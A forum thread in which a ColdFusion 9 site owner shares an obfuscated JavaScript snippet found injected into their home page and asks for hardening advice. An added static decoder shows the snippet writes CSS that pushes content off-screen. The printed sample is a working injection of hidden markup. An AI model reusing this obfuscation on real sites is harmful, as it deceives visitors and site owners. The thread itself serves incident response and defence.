nachtmsk
asked on
Coldfusion Hack of some type
Hi,
I have a site running CF9. It's been running for a few years with no major problems.
Today I noticed my home page timestamp had changed. When I compared the code to the back up version I found some javascript inserted that I definitely did not put in.
The code is below.
What are some of the common ways this could have gotten inserted and what can/should I do to protect my server?
Thanks,
Nacht
<script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
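A static decode of the string table in the script posted above, as an added example that is not part of the original thread: it reproduces the script's arithmetic without running it or calling document.write, so the markup it would emit can be read safely. The function names (decodeEntry, decodeTable, reconstruct, hidesContent) are hypothetical, and the digit strings are the ones from the post with whitespace removed.

```javascript
// Added example: static decode of the injected script's string table.
// Nothing from the sample is executed; only its arithmetic is reproduced.
// Digit strings are the ones in the post, with whitespace removed.
const POSTED = [
  '9091968376',
  '8887918192818786347374918784939277359287883421333333338896',
  '9977918890',
  '949990793917947998942577939317',
];

// The sample adds (25 - l + a) to each two-digit pair while it processes
// x[l - a], so the shift for the entry at position `index` is 25 - index.
function decodeEntry(digits, index) {
  const clean = digits.replace(/\s+/g, '');
  if (!/^\d*$/.test(clean) || clean.length % 2 !== 0) {
    throw new Error('entry ' + index + ': expected an even run of digits');
  }
  let out = '';
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 10) + 25 - index);
  }
  return out;
}

function decodeTable(entries) {
  return entries.map((digits, index) => decodeEntry(digits, index));
}

// Rebuild the string the sample passes to document.write(). The sample
// reads x[4] for the tag attributes, which is out of range for the four
// strings as posted, so that slot comes out as the text "undefined".
function reconstruct(entries) {
  const x = decodeTable(entries);
  return '<' + x[0] + ' ' + x[4] + '>.' + x[2] + '{' + x[1] + '}</' + x[0] + '>';
}

// Flag CSS that pushes an element far off-screen, a common way injected
// markup is kept out of a visitor's view while staying in the page source.
function hidesContent(css) {
  return /position\s*:\s*absolute/i.test(css) &&
         /(top|left)\s*:\s*-\d{3,}px/i.test(css);
}

console.log(decodeTable(POSTED));
console.log(reconstruct(POSTED));
```

Run against the posted strings, the table decodes to a tag name, a CSS rule that positions its target off-screen, a class name and a type attribute.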
Have you installed all the updates to CF9? Do you have your CF Administrator locked down or deleted from the production server? Are you running Windows or Linux?
ASKER
@Rick : I am running Windows Server 2008. I think I have all the updates to CF9, but I'm not certain, I will check that out.
When you say do I have CF admin locked down, what do you mean exactly?
Thanks,
Nacht
Basically you should not be able to get to the ColdFusion Administrator site from the internet. You need to check this on every site you have set up.
Check this site out. Has a link to a tester.
ASKER
@Rick -- you forgot to put the link to that site you mentioned :)
I agree with SidFishes that the safest thing to do is format and start over.
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228